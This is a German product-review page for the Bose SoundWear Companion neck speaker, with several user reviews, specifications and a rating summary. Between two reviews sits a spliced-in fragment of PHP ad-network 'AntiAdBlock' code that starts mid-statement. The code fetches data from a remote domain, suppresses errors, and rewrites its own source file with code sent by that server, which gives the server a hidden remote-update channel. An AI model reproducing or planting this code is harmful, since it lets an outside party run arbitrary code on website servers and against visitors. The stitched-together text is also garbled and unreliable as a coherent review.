Bose ® SoundWear Companion Lautsprecher – Genialer Klang, perfekte Connection. Nur der Mehrwert erschliesst sich mir nicht.

Diese art von “kopfhörer” ist sehr besonders und am anfang , denkt man sofort, was soll man denn damit?aber wenn man es dann hat und ausprobiert ist man einfach nur geflasht und hinweg. Die qualität ist wie alles von bose super hochwertig, sehr stabil, sauber verarbeitet. Macht nicht nur einen sehr hochwertigen eindruck, es ist aucgh sehr hochwertig. Natürlich ist es sehr gewöhnungsbedürftig, sich einen lautsprecher um zulegen und nicht direkt auf die ohren zu packen. Aber hier klares plus, keine frisur wird gestaucht oder verstruppelt. Was man nicht vergessen sollte, ist die funktion der lautsprecher, sie beschallen einen zwar nicht direkt und damit hört man es auch nicht alleine. Natürlich nicht so “laut” und klar wie man selber, aber es bekommt was mit. Das muss bei der anschaffung auf jeden fall mit bedenken. Aber was eigentlich viel wichtiger ist, ist der schutz für die ohren, da keine direkt beschallung erfolgt und das wirklich hervorragende klangerlebnis, was ich bisher mit keinen klassischen kopfhörern erlebt habe.

Ich war skeptisch: ein lautsprecher, den man sich um den hals hängt?. Aber ob das im alltag praktikabel ist?unboxing und einrichten:der companion kommt bestens in einen hochwertigen und schicken karton verpackt. Auspacken, die app “bose connect” herunterladen, den lautsprecher anschalten (ist schon zu ca. 80% aufgeladen), den anweisungen in der app folgen und innerhalb weniger minuten ist der lautsprecher schon einsatzbereit. Gewicht und tragekomfort:ich war erstaunt, wie leicht der companion ist. Man spürt ihn kaum und bereits nach wenigen minuten hat man völlig vergessen, dass man ihn trägt. Selbst nach 3 stunden dauereinsatz hatte ich weder beschwerden noch spürte ich den lautsprecher. Man kann sich damit ganz normal bewegen. Ich habe die wohnung geputzt und mich dabei gebückt, gestreckt, bin treppen rauf und runter gelaufen.

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();

Die lautsprecher werden ähnlich wie ein kragen umgelegt. Der vorteil ist, dass man die umwelt gut wahrnimmt. Man sollte jedoch beachten, dass personen im raum den klang ebenfalls hören, wenn auch leise. Der klang ist sehr gut (klarer klang, ausgewogener bass). Die bluetoothkopplung klappte sofort. Die lautsprecher sind weich gummiert und gut verarbeitet, es gibt einen „schonbezug“. Der ladezustand wird über 4 dioden und bei jedem einschalten über die lautsprecher angesagt. Die handhabung ist selbsterklärend, die beigefügte bedienungsanleitung ist dürftig. Beim telefonieren sind beide teilnehmer sehr gut und klar verständlich. Der zweite gesprächsteilnehmer hörtseine stimme, bedingt durch die lautsprecher, mit hall. Hier sind die Spezifikationen für die Bose ® SoundWear Companion Lautsprecher:

  • Geben Sie Ihr Modell ein,
    um sicherzustellen, dass dieser Artikel passt.
  • Nackenlautsprecher für höchsten Tragekomfort, mit dem Sie Ihre Musik genießen, Anrufe annehmen und auf den virtuellen Assistenten Ihres Smartphones zugreifen können, während Sie gleichzeitig mit Ihrer Umgebung in Verbindung bleiben
  • Dank der US-patentierten Waveguide-Technologie, digitaler Signalverarbeitung und nach oben gerichteten Lautsprechern genießen Sie naturgetreuen, kraftvollen Spitzenklang, der Sie in Ihre Musik eintauchen lässt
  • Steuerung mit 3 Tasten für Anrufe, Musikwiedergabe und Zugriff auf Siri oder den Google Assistant auf Ihrem Smartphone
  • Wiedergabedauer von bis zu 12 Stunden pro Akkuladung dank des Lithium-Ionen-Akkus
  • Schweiß- und wetterresistent (Schutzklasse IPX4), inklusive Bezug aus Vier-Wege-Stretchmaterial, der sich weder statisch auflädt noch Staub anzieht

Ich erhielt den bose soundwear companion lautsprecher im rahmen eines produkttests. Das einstellen des lautspreches wird durch eine kostenlose app von bose durchgeführt. Das umstellen auf die deutsche sprache lief problemlos. Via bluetooth werden sowohl meine beiden smartphones als auch mein musikabspielgerät (amazon fire tab) schnell erkannt und verbunden. Der klang beim musikabspielen ist wirklich beeindruckend. Man spürt die bässe bis in die schultern und hat auch bei höheren lautstärken keine verzerrungen. Auch die verwendung als freisprecheinrichtung funktioniert klasse. Das annehmen eines telefonats erfolgt durch einen tastendruck seitlich am lautsprecher. Hier kann auch die lautstärke eingestellt werden. Ansonsten ist nur ein einschaltknopf und ein bluetooth verbindungsknopf auf der anderen seite des lautsprechers.

Ich habe sehr viele bose produkte und bin auch ein echter fan, jedoch bin ich mir bewusst, dass es viele andere hersteller gibt die besser oder auch günstiger sind. Es handelt sich bei dem soundware companion lautsprecher und ein relativ neues produkt, was eine mischung aus kopfhörer und portablem lautsprecher sein soll. Technik und ausstattung lasse ich jetzt mal außen vor, dies kann direkt bei bose nachgelesen werden. Das wichtigste was zu dem neuen produkt zu sagen ist, wofür kann es genutzt werden ???1. Radfahren – wie dafür gemacht, stört nicht am helm, man hat die ohren frei für die umwelt, keine störenden windgeräusche2. Büro – musik hören und gleichzeitig alles andere mitbekommen sowie jederzeit schnell telefonieren (bei hoher lautstärke können sich kollegen daran stören, aufpassen)3. Bei allen anderen tätigkeiten, bei denen ich etwas von der umwelt noch mitbekommen möchte und keinen anderen stören möchte. Die lautsprecher sind so konzipiert, dass der höhrgenuss tatsächlich nur direkt bei den ohren liegt. Andere personen bekommen zwar je nach lautstärke etwas mit, dies wirkt jedoch nur wir ein leises bis sehr leises radio im hintergrund. Beispiel: ich bin im schwimmbadund möchte etwas lauter musik hören, meine frau jedoch nur leise.

Kommentare von Käufern :

  • Die Adelung des Nackens
  • Genialer Klang, perfekte Connection. Nur der Mehrwert erschliesst sich mir nicht.
  • Man spürt ihn gar nicht – macht alles mit!

Der „bose soundwear companion wearable speaker“ ist für mich das überraschendste gadget des noch frühen jahres 2018. Es ist eines dieser geräte von denen man erst weiß, dass man sie braucht, wenn man sie hat. Verarbeitung:bose-typisch – ohne makel. Alle verwendeten materialien sind hochwertig oder vermitteln zumindest ein hochwertiges gefühl. Der Überzug besteht aus einem stoff-kunstledermix, der sich auch (leider etwas fummelig) abnehmen lässt um ihn bspw. Zu waschen oder aber um den companion im „rohen tech-look“ auf den schultern ruhen zu lassen. Der soundwear companion selbst besteht aus einer art geschmeidigem silikon, das sich auch bei direktem hautkontakt überraschend gut anfühlt. Im sommer würde ich das gerät allerdings nur mit dem mitgelieferten Überzug benutzen, da silikon (ganz egal wie geschmeidig dieses ist) direkt auf der haut eine recht schweißtreibende angelegenheit sein kann. Tragecomfort:der tragecomfort ist ausgezeichnet und trotz des zuerst spürbaren gewichts, fällt einem der „halsschmuck“ mit längerem tragen immer weniger auf. Durch die elastischen qualitäten des hauptmaterials, passte sich der companion allen getesteten schulterformen problemlos an. Besten Bose ® SoundWear Companion Lautsprecher, schwarz

Ich sitze jetzt vor meinem laptop und habe die lautsprecher lässig über die schulter gelegt. Beim schreiben der rezension werde ich von boses soundwear companion lautsprecher beschallt und unterhalten. Die frage des nutzens erschloss sich mir nicht sofort. Was bringt mir ein mischmasch aus kopfhörer und normaler soundanlage?.Wann soll ich sowas verwenden?. Die website des herstellers gibt darüber schon den einen oder anderen erkenntnisgewinn. Der geneigte besucher sieht dort menschen, die mit dem soundwear companion in der küche stehen und kochen oder putzen. Schließlich ist das kochen mit kopfhörer (vor allem mit kabel) sehr umständlich und gefährlich. Auch beim staubsaugen nervt die tatsache, dass sie die musik durch die lautstärke des saugers gar nicht hören können.

Summary
Review Date
Reviewed Item
Bose ® SoundWear Companion Lautsprecher, schwarz
Rating
5,0 of 5 stars, based on 9 reviews

Author: SmartHome